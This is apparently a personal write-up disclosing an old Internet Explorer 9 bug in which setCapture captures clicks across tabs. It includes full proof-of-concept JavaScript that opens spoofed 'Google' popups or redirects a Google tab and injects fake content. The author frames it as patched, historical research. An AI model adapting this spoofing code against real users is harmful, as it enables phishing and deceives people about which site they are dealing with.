IE9: setCapture Through Tabs Enables UI Spoofing

I was exploring what setCapture could do across tab boundaries and found that it was surprisingly permissive. A page in one tab can capture all mouse clicks — even those made in a completely different tab, or even outside the browser entirely — and react to them by opening popups or redirecting the other tab. This opens up a range of UI deception scenarios.

<span id="sp"></span>
<script language="JavaScript">
var stopCapturing, evilWindow;

function PoC1()
{
    stopCapturing = false;
    window.open("http://www.google.com");
    document.getElementById("sp").onclick = function()
    {
        evilWindow = window.open("about:blank","","height=300,width=300");
        evilWindow.document.body.innerHTML = "I am an evil popUp that seems to be opened by Google.";
        evilWindow.document.title = "google.com";
        stopCapturing = true;
    }
    setTimeout('setRelease(false)', 500);
}

function PoC2()
{
    stopCapturing = false;
    evilWindow = window.open("http://www.google.com");
    document.getElementById("sp").onclick = function()
    {
        stopCapturing = true;
        evilWindow.location.href = "about:blank";
        setTimeout('evilWindow.document.body.innerHTML = "I am an evil URL that seems to be loaded when clicking on a link of Google.<br />Of course the URL shows about:blank, but did you notice it?";evilWindow.document.title = "google.com";', 100);
    }
    setTimeout('setRelease(false)', 500);
}

function setRelease(captured)
{
    if (stopCapturing) return document.getElementById("sp").releaseCapture();
    if (captured)
    {
        document.getElementById("sp").releaseCapture();
        setTimeout("setRelease(false)", 10);
    }
    else
    {
        document.getElementById("sp").setCapture();
        setTimeout("setRelease(true)", 200);
    }
}
</script>

The first variant opens Google in a new tab and intercepts the next click anywhere in the browser. When the click fires, a popup appears that looks like it came from Google. The second variant takes things further: it redirects the Google tab to about:blank and then injects content, creating the illusion that Google itself navigated away. The alternating setCapture/releaseCapture rhythm keeps the cursor behavior reasonably natural so the deception is less obvious.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.